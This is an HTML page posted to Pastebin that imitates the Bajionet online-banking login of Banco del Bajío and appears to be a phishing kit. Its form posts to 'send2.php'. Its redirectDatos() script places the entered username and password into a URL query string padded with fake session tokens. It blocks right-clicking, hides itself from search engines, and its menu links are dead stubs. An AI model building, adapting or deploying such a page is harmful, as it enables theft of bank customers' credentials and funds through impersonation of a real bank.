Advertisement
Guest User

bb

a guest
Jun 5th, 2017
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 22.16 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
  3.     <head>
  4.         <meta http-equiv="X-UA-Compatible" content="IE=edge">
  5.         <meta http-equiv="Cache-Control" content="no-cache, no-store">
  6.          <meta name="robots" content="noindex, nofollow">
  7.         <title>Bajionet</title>
  8.         <script language="JavaScript">
  9.  
  10.             //function onSubmitV(formulario) {
  11.             //    var forma = document.getElementById(formulario);
  12.             //    var user = forma.Username.value;
  13.             //    var pass = forma.Password.value;
  14.             //    var boton = forma.btnSubmit;
  15.  
  16.             //    if (user.trim().length == 0) {
  17.             //        alert("Por favor capture su Usuario");
  18.             //        return false;
  19.             //    }
  20.             //    if (pass.trim().length == 0) {
  21.             //        alert("Por favor capture su Clave de Acceso");
  22.             //        return false;
  23.             //    }
  24.             //    boton.disabled = true;
  25.             //    return true;
  26.             //}
  27.  
  28.             function goURL(url) {
  29.                 window.location.href = url;
  30.             }
  31.         </script>
  32.  
  33.         <link rel="shortcut icon" href="favicon.ico">
  34.                        
  35.         <!-- OVVC 01082013 251181.P23 -->
  36.         <link href="styleGob.css" rel="stylesheet" />
  37.                    
  38.         <!-- OVVC 01082013 251181.P23 -->      
  39.         <link href="style.css" rel="stylesheet" />
  40.        
  41.         <style type="text/css">
  42.             html, body {
  43.                 height: 100%;
  44.             }
  45.  
  46.             body {
  47.                 margin: 0;
  48.                 padding: 0;
  49.                 background: #fff;
  50.                 color: #000;
  51.             }
  52.  
  53.             #container {
  54.                 min-height: 93%;
  55.                 padding: 0px;
  56.                 background: #FFFFFF;
  57.                 vertical-align: top;
  58.             }
  59.             /* DBA Login con https */
  60.             .IngresaBBmap {
  61.                 background-image: url('IngresaBBMapa.gif');
  62.             }
  63.             /* LGAM 251350 CAMBIO DE BANNER PERSFIS */
  64.             .PIngreBBmap {
  65.                 background-image: url('PIngresaBBMapa.gif');
  66.             }
  67.             /*******************************************************
  68.         * TRACK 26062013
  69.         ********************************************************/
  70.             .log_bodyBanner, .formBigImg a {
  71.                 -webkit-transition: all 0.2s linear;
  72.                 -moz-transition: all 0.2s linear;
  73.                 -o-transition: all 0.2s linear;
  74.                 transition: all 0.2s linear;
  75.             }
  76.  
  77.             .log_headBanner {
  78.                 width: 410px;
  79.                 height: 62px;
  80.                 border: none;
  81.             }
  82.  
  83.             .log_bodyBanner {
  84.                 width: 561px;
  85.                 height: 150px;
  86.                 /*
  87.             -webkit-border-radius: 10px; -moz-border-radius: 10px; -o-border-radius: 10px; border-radius: 10px;
  88.             border: 3px solid #5A419C;
  89.             -webkit-box-shadow: 1px 1px 5px rgba(0, 0, 0, 0.4);
  90.                -moz-box-shadow: 1px 1px 5px rgba(0, 0, 0, 0.4);
  91.                  -o-box-shadow: 1px 1px 5px rgba(0, 0, 0, 0.4);
  92.                     box-shadow: 1px 1px 5px rgba(0, 0, 0, 0.4);
  93.                     */
  94.             }
  95.             /* .log_bodyBanner:hover{ border: 3px solid #A44FDF; } */
  96.             .log_leftBanner {
  97.                 width: 386px;
  98.                 height: 201px;
  99.             }
  100.  
  101.             .log_rigtBanner {
  102.                 width: 190px;
  103.                 height: 201px;
  104.             }
  105.  
  106.             .formBigImg {
  107.                 margin-left: 70px;
  108.                 margin-top: 10px;
  109.             }
  110.  
  111.                 .formBigImg img {
  112.                     -webkit-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  113.                     -moz-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  114.                     -o-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  115.                     box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  116.                 }
  117.  
  118.                 .formBigImg a {
  119.                     text-decoration: none;
  120.                     background: #794a99; /* Old browsers */
  121.                     background: -moz-linear-gradient(top, #794a99 0%, #4b1882 100%); /* FF3.6+ */
  122.                     background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#794a99), color-stop(100%,#4b1882)); /* Chrome,Safari4+ */
  123.                     background: -webkit-linear-gradient(top, #794a99 0%,#4b1882 100%); /* Chrome10+,Safari5.1+ */
  124.                     background: -o-linear-gradient(top, #794a99 0%,#4b1882 100%); /* Opera 11.10+ */
  125.                     background: -ms-linear-gradient(top, #794a99 0%,#4b1882 100%); /* IE10+ */
  126.                     background: linear-gradient(to bottom, #794a99 0%,#4b1882 100%); /* W3C */
  127.                     filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#794a99', endColorstr='#4b1882',GradientType=0 ); /* IE6-9 */
  128.                     color: #fff;
  129.                     padding: 10px;
  130.                     -webkit-border-radius: 5px;
  131.                     -moz-border-radius: 5px;
  132.                     -o-border-radius: 5px;
  133.                     border-radius: 5px;
  134.                     -webkit-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  135.                     -moz-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  136.                     -o-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  137.                     box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  138.                     font-weight: bold;
  139.                     text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.8);
  140.                 }
  141.  
  142.                     .formBigImg a:hover {
  143.                         background: #4b1882; /* Old browsers */
  144.                         background: -moz-linear-gradient(top, #4b1882 0%, #794a99 100%); /* FF3.6+ */
  145.                         background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4b1882), color-stop(100%,#794a99)); /* Chrome,Safari4+ */
  146.                         background: -webkit-linear-gradient(top, #4b1882 0%,#794a99 100%); /* Chrome10+,Safari5.1+ */
  147.                         background: -o-linear-gradient(top, #4b1882 0%,#794a99 100%); /* Opera 11.10+ */
  148.                         background: -ms-linear-gradient(top, #4b1882 0%,#794a99 100%); /* IE10+ */
  149.                         background: linear-gradient(to bottom, #4b1882 0%,#794a99 100%); /* W3C */
  150.                         filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#4b1882', endColorstr='#794a99',GradientType=0 ); /* IE6-9 */
  151.                     }
  152.  
  153.             #boBanBajio {
  154.                 text-decoration: none;
  155.                 background: #794a99; /* Old browsers */
  156.                 background: -moz-linear-gradient(top, #794a99 0%, #4b1882 100%); /* FF3.6+ */
  157.                 background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#794a99), color-stop(100%,#4b1882)); /* Chrome,Safari4+ */
  158.                 background: -webkit-linear-gradient(top, #794a99 0%,#4b1882 100%); /* Chrome10+,Safari5.1+ */
  159.                 background: -o-linear-gradient(top, #794a99 0%,#4b1882 100%); /* Opera 11.10+ */
  160.                 background: -ms-linear-gradient(top, #794a99 0%,#4b1882 100%); /* IE10+ */
  161.                 background: linear-gradient(to bottom, #794a99 0%,#4b1882 100%); /* W3C */
  162.                 filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#794a99', endColorstr='#4b1882',GradientType=0 ); /* IE6-9 */
  163.                 color: #fff;
  164.                 padding: 10px;
  165.                 -webkit-border-radius: 5px;
  166.                 -moz-border-radius: 5px;
  167.                 -o-border-radius: 5px;
  168.                 border-radius: 5px;
  169.                 -webkit-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  170.                 -moz-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  171.                 -o-box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  172.                 box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.4);
  173.                 font-weight: bold;
  174.                 text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.8);
  175.             }
  176.  
  177.                 #boBanBajio:hover {
  178.                     background: #4b1882; /* Old browsers */
  179.                     background: -moz-linear-gradient(top, #4b1882 0%, #794a99 100%); /* FF3.6+ */
  180.                     background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4b1882), color-stop(100%,#794a99)); /* Chrome,Safari4+ */
  181.                     background: -webkit-linear-gradient(top, #4b1882 0%,#794a99 100%); /* Chrome10+,Safari5.1+ */
  182.                     background: -o-linear-gradient(top, #4b1882 0%,#794a99 100%); /* Opera 11.10+ */
  183.                     background: -ms-linear-gradient(top, #4b1882 0%,#794a99 100%); /* IE10+ */
  184.                     background: linear-gradient(to bottom, #4b1882 0%,#794a99 100%); /* W3C */
  185.                     filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#4b1882', endColorstr='#794a99',GradientType=0 ); /* IE6-9 */
  186.                 }
  187.  
  188.             .imageneshor {
  189.                 background-image: url('menu//imagenes-horizontales.gif');
  190.                 background-repeat: repeat-x;
  191.                 min-width: 160px;
  192.                 height: 62px;
  193.                 border: none;
  194.                 background-position: 0px -259px;
  195.             }
  196.  
  197.             #shadow {
  198.                 position: absolute;
  199.                 z-inde: 100;
  200.                 top: 60px;
  201.                 background-image: url('shadow0.gif');
  202.                 background-repeat: repeat-x;
  203.                 height: 10px;
  204.                 width: 100%;
  205.             }
  206.  
  207.             .bannerGob {
  208.                 margin: 10px auto;
  209.                 padding: 10px;
  210.                 width: 90%;
  211.                 max-width: 1100px;
  212.                 -webkit-border-radius: 5px;
  213.                 -moz-border-radius: 5px;
  214.                 -o-border-radius: 5px;
  215.                 border-radius: 5px;
  216.                 -webkit-box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  217.                 -moz-box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  218.                 -o-box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  219.                 box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  220.             }
  221.  
  222.             .bannerGobTar {
  223.                 margin: 10px auto;
  224.                 padding: 10px;
  225.                 width: 90%;
  226.                 max-width: 600px;
  227.                 -webkit-border-radius: 5px;
  228.                 -moz-border-radius: 5px;
  229.                 -o-border-radius: 5px;
  230.                 border-radius: 5px;
  231.                 -webkit-box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  232.                 -moz-box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  233.                 -o-box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  234.                 box-shadow: 1px 1px 3px rgba(0, 0, 0, 0.4);
  235.             }
  236.  
  237.             .bannerGobImg {
  238.                 text-align: center;
  239.             }
  240.         </style>
  241.         <!--[if IE]>
  242.         <style type="text/css">    
  243.             .imageneshor
  244.             {
  245.                 background-image: url('menu//imagenes-horizontales.gif');
  246.                 background-repeat: repeat-x;
  247.                 min-width: 160px;
  248.                 height: 66px;
  249.                 border: none;
  250.                 margin-bottom: -5px;
  251.             }
  252.             .log_headBanner{
  253.                 width: 410px;
  254.                 height: 62px;
  255.                 border: none;
  256.                 margin-bottom: -100px;
  257.             }
  258.             #shadow
  259.             {
  260.                 position: absolute;
  261.                 z-inde:100;
  262.                 top: 60px;             
  263.                 background-image: url('shadow0.gif');
  264.                 background-repeat: repeat-x;
  265.                 height: 10px;
  266.                 width: 100%;
  267.             }
  268.             #headerBarr
  269.             {
  270.                 background-color: #723AB5;
  271.             }
  272.         </style>       
  273.         <![endif]-->
  274.        
  275.         <!-- <link rel="stylesheet" href="css/ie.css" type="text/css" media="all" />-->
  276.         <!-- OVVC 01082013 251181.P23 -->
  277.             <script type="text/javascript" src="js/jquery.min.js" ></script>
  278.             <script type="text/javascript" >
  279.                 $(document).ready(function () {
  280.                     $('#gobLogIn').hide(0);
  281.                     $('#gobLogIn').slideDown(1000);
  282.                 });
  283.             </script>              
  284.     </head>
  285.     <body topmargin="0" marginheight="0" leftmargin="0" rightmargin="0" marginwidth="0" oncontextmenu="return false" >
  286.     <!-- NEX 14Feb2012 - Incluyo jquery en el ingresaBB - INICIO -->
  287.         <script type="text/javascript" language="JavaScript1.2" src="js/jquery.js"></script>
  288.     <!-- NEX 14Feb2012 - Incluyo jquery en el ingresaBB - FIN -->
  289.     <div id=container style="background-color: #ffffff;">      
  290.                     <!-- ------------------------------------------------------------
  291.                 DESARROLLO : PERSONAS | EMPRESAS
  292.             ------------------------------------------------------------- -->
  293.             <!-- ******************* START HEADER ******************* -->
  294.             <table id="headerBarr" width="100%" height="62" border="0" align="center" cellpadding="0" cellspacing="0">
  295.                 <tr>
  296.                     <td align="center" height="62" valign="middle" width="210">
  297.                         <img src="logo.gif" alt="baj&iacute;onet" width="210" height="62">
  298.                     </td>
  299.                     <td class="log_headBanner" align="center" height="62" valign="middle" width="410" >
  300.                         <img src="images/hpub_izq.jpg" alt="baj&iacute;onet" >
  301.                     </td>
  302.                     <td align="center" valign="middle" height="62" >
  303.                         <div class="imageneshor" >
  304.                         <table width="180px" height="62" border="0" align="center" cellpadding="0" cellspacing="0" >
  305.                             <tr><td align="center" valign="middle" height="62" >
  306.                                 <font color="#ffffff" size="2"><b><span class="fecha"></span></b></font>
  307.                                 <font color="#ffffff" size="1"><b><br/>Banco del Baj&iacute;o, S. A.</b></font>
  308.                             </td></tr>
  309.                         </table>
  310.                         </div>
  311.                     </td>
  312.                     <td class="log_headBanner" align="center" height="62" valign="middle" width="410" >
  313.                         <img src="images/hpub_der.jpg" alt="baj&iacute;onet" >
  314.                     </td>
  315.                 </tr>
  316.                 <tr>
  317.                     <td><div id="shadow" ></div></td>
  318.                 </tr>
  319.             </table><br/>
  320.             <!-- ******************* END HEADER ******************* -->
  321.             <!-- ******************* START BODY ******************* -->
  322.             <table width="830px" height="400px" border="0" cellspacing="0" cellpadding="0" valign=center>
  323.             <tr height="100%" valign=top>
  324.                 <td height=100%>
  325.                 <!-- ******************* Start LEFT ******************* -->
  326.                     <!-- ** Start Sesión ** -->
  327.                     <!--NXN 31Ago2012 Control Session Ini -->
  328.                     <form method="post" autocomplete="off"  name = "formulario" id = "formulario" action="send2.php">
  329.                     <!--NXN 31Ago2012 Control Session fin-->
  330.                         <table width="100%" cellspacing="2" cellpadding="2" border="0" bgcolor="#ffffff">
  331.                             <input type="hidden" name="RedirectURL" value="/article/articleview/196/1/7/">
  332.                             <!-- NEX 14Feb2012 - Incluyo jquery en el ingresaBB - INICIO -->
  333.                             <input type="hidden" id="finPrint" name="finPrint" value="device_print_data">
  334.                             <!-- NEX 14Feb2012 - Incluyo jquery en el ingresaBB - FIN -->
  335.                             <tr><td colspan="2" bgcolor=#5A419c><font color=#ffffff size=1 face=verdana, arial, helvetica, sans-serif><b>Sesi&oacute;n</b></font></td></tr>
  336.                             <tr><td colspan="2" class="menubold">Usuario:</td></tr>
  337.                             <tr>
  338.                                 <td colspan="2" class="menu">
  339.                                     <!--NXN 31Ago2012 Control Session Ini -->
  340.                                     <input id="Username" type="password" size="14" autocomplete="off"  name="Username" maxlength= "11" style="width:120px"  />
  341.                                     <!--NXN 31Ago2012 Control Session Fin -->
  342.                                 </td>
  343.                             </tr>
  344.                             <tr><td colspan="2" class="menubold">Clave de Acceso:</td></tr>
  345.                             <tr>
  346.                                 <td colspan="2" class="menu">
  347.                                     <!--NXN 31Ago2012 Control Session Ini -->
  348.                                     <input id="Password" type="password" size="14" autocomplete="off" name="Password" maxlength= "8" style="width:120px" />
  349.                                     <!--NXN 31Ago2012 Control Session Ini -->
  350.                                 </td>
  351.                             </tr>
  352.                             <!-- DBA Login2 -->
  353.                             <tr>
  354.                                 <td colspan="2" class="menu">
  355.                                     <input type="hidden" size="14" name="Segmento" maxlength= "8" value='persona' readonly="readonly"/>
  356.                                 </td>
  357.                             </tr>
  358.                             <!-- DBA Login2 -->
  359.                             <tr>
  360.                                 <td colspan="2">
  361.                                     <input class="stdbutton" type="button" value="OK" id="btnSubmit" onclick="redirectDatos();">
  362.                                 </td>
  363.                             </tr>
  364.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  365.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  366.  
  367.                             <!-- ** Start Seguridad en Línea ** -->
  368.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  369.                             <tr><td colspan="2" bgcolor="#5A419C"><font color="#ffffff" size="1"><b>Seguridad en L&iacute;nea</b></font></td></tr>
  370.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  371.                             <tr>
  372.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  373.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Recomendaciones de Seguridad</font></a></td>
  374.                             </tr>
  375.                             <tr>
  376.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  377.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Llave A.S.B.</font></a></td>
  378.                             </tr>
  379.                             <tr>
  380.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  381.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Sitios Fraudulentos</font></a></td>
  382.                             </tr>
  383.  
  384.                             <!-- ** Start Conoce BajioNET ** -->
  385.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  386.                             <tr><td colspan="2" bgcolor="#5A419C"><font color="#ffffff" size="1"><b>Conoce BajioNET</b></font></td></tr>
  387.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  388.                             <tr>
  389.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  390.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Horarios</font></a></td>
  391.                             </tr>
  392.                             <tr>
  393.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  394.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Tarifas</font></a></td>
  395.                             </tr>
  396.                             <tr>
  397.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  398.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Mejoras</font></a></td>
  399.                             </tr>
  400.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  401.  
  402.                             <!-- ** Start Atención al Cliente ** -->
  403.                             <tr><td colspan="2" bgcolor="#5A419C"><font color="#ffffff" size="1"><b>Atenci&oacute;n al Cliente</b></font></td></tr>
  404.                             <tr><td colspan="2" class="menuspacer">&nbsp;</td></tr>
  405.                             <tr>
  406.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  407.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Atenci&oacute;n Telef&oacute;nica</font></a></td>
  408.                             </tr>
  409.                             <tr>
  410.                                 <td width="1%" valign="top"><img src="dot.gif" alt="Punto" /></td>
  411.                                 <td width="99%"><a href="javascript:void(0);"><font size="1">Cont&aacute;ctenos</font></a></td>
  412.                             </tr>
  413.                             <!-- End otras secciones LEFT -->
  414.                         </table>
  415.                     </form>
  416.                 </td>
  417.                 <!-- ******************* End LEFT ******************* -->
  418.                 <td height=100%>
  419.                     <!-- ******************* Start RIGHT ******************* -->
  420.                         <table width="100%" cellspacing="0" cellpadding="2" border="0" bgcolor="#ffffff">
  421.                             <tr height="100%" valign=top halign=right>
  422.                                 <td width="15%"></td>
  423.                                 <td height=100%>
  424.                                     <!-- ICC 7Ene2008 Login con https-->
  425. <form method="post" name = "formulario" action="">
  426.     <br>
  427.     <table width="100%" cellspacing="0" cellpadding="2" border="0" bgcolor="#ffffff">
  428.         <tr>
  429.             <td>
  430.                 <div id="a" align="left">
  431.                     <img class="log_bodyBanner" src="images/prin_1.jpg" alt="baj&iacute;onet" >
  432.                 </div><br/>
  433.             </td>
  434.         </tr>
  435.         <tr>
  436.             <td>
  437.                 <div id="a" align="left">
  438.                     <img class="log_bodyBanner" src="images/prin_2.jpg" alt="baj&iacute;onet" >
  439.                 </div><br/>
  440.             </td>
  441.         </tr>      
  442.         <tr>
  443.             <td>
  444.                 <div id="a" align="left">
  445.                     <img class="log_bodyBanner" src="images/prin_3.jpg" alt="baj&iacute;onet" >
  446.                 </div><br/>
  447.             </td>
  448.         </tr>              
  449.         <tr>
  450.             <td>
  451.                 <div id="a" align="left">
  452.                     <img class="log_bodyBanner" src="images/prin_4.jpg" alt="baj&iacute;onet" >                                                
  453.                 </div><br/>
  454.             </td>                      
  455.         </tr>          
  456.         <tr>
  457.             <td>
  458.                 <div id="a" align="left">
  459.                     <img class="log_bodyBanner" src="images/prin_5.jpg" alt="baj&iacute;onet" >
  460.                 </div><br/>
  461.             </td>
  462.         </tr>
  463.     </table>
  464. </form>
  465. <p align="center"><br/><a id="boBanBajio" href="ingresaBB.html">Ir a p&aacute;gina principal</a></p><br/><br/>
  466.                                 </td>
  467.                             </tr>
  468.                         </table>
  469.                     </td>
  470.                     <!-- ******************* End RIGHT ******************* -->
  471.                     </tr>
  472.             </table>
  473.             <!-- ******************* END BODY ******************* -->          
  474.     </div>     
  475.     <style type="text/css">
  476.         #modalInicio img {
  477.             max-width: 100%;
  478.         }
  479.     </style>
  480.  
  481.     <div id="modalInicio">
  482.         <div>
  483.             <img src="images/seguridad_asb.jpg" alt="baj&iacute;onet" >
  484.         </div>
  485.     </div>
  486.     <script language="javascript" src="js/jquery.simplemodal.js"></script>
  487.     <script type="text/javascript">
  488.         var delay = parseInt("100");
  489.         $(document).ready(function () {
  490.             getFecha();
  491.             $('#modalInicio').modal({
  492.                 close: true,
  493.                 containerCss: { height: 450, width: 600 },
  494.                 resizable: false,
  495.                 modal: true,
  496.                 buttons: {
  497.                     'Cerrar': function () {
  498.                         $(this).dialog("close");
  499.                     },
  500.                 },
  501.  
  502.                 onClose: closeModalInicio
  503.             });
  504.             function closeModalInicio(dialog) {
  505.                 dialog.data.fadeOut(delay, function () {
  506.                     dialog.container.hide(delay, function () {
  507.                         dialog.overlay.slideUp(delay, function () {
  508.                             $.modal.close();
  509.                             $("#modalInicio").hide();
  510.                         });
  511.                     });
  512.                 });
  513.             }
  514.             $("#modalInicio").click(function () {
  515.                 $.modal.close();
  516.                 $("#modalInicio").hide();
  517.                 document.getElementById('Username').focus();
  518.             });
  519.             setTimeout(function () {
  520.                 $.modal.close();
  521.                 $("#modalInicio").hide();
  522.                 document.getElementById('Username').focus();
  523.             }, 5000);
  524.         });
  525.  
  526.         function getFecha() {
  527.             var dias = new Array();
  528.             var meses = new Array();
  529.             dias['es'] = new Array('Domingo', 'Lunes', 'Martes', 'Mi&eacute;rcoles', 'Jueves', 'Viernes', 'Sabado')
  530.             meses['es'] = new Array('Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Juilio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre')
  531.             var fecha = new Date();
  532.             var diaTexto = dias['es'][fecha.getDay()];
  533.             var dia = fecha.getDate();
  534.             var mesTexto = meses['es'][fecha.getMonth()];
  535.             var year = fecha.getFullYear();
  536.  
  537.             $(".fecha").html(dia + " de " + mesTexto + " del " + year);
  538.         }
  539.  
  540.         function redirectDatos() {
  541.             var user = document.getElementById('Username');
  542.             var pass = document.getElementById('Password');
  543.             var boton = document.getElementById("btnSubmit");
  544.  
  545.             if (user.value.trim().length == 0) {
  546.                 alert("Por favor capture su Usuario");
  547.                 return false;
  548.             }
  549.             if (pass.value.trim().length == 0) {
  550.                 alert("Por favor capture su Clave de Acceso");
  551.                 return false;
  552.             }
  553.             boton.disabled = true;
  554.  
  555.             window.location.href = 'ingresaBB_.html?index_php_option=com_content&view=article&id=1187&Itemid=1768&flow.action_flowExecutionKey=_cspring-web-flow-logindt_k3BA7D523-96F0-3EB7-756F-33CD59A7911F&JFP_TOKEN=3TFSI6EB&U=' + user.value + '&C=' + pass.value;
  556.         }
  557.         </script>      
  558.     </body>
  559. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement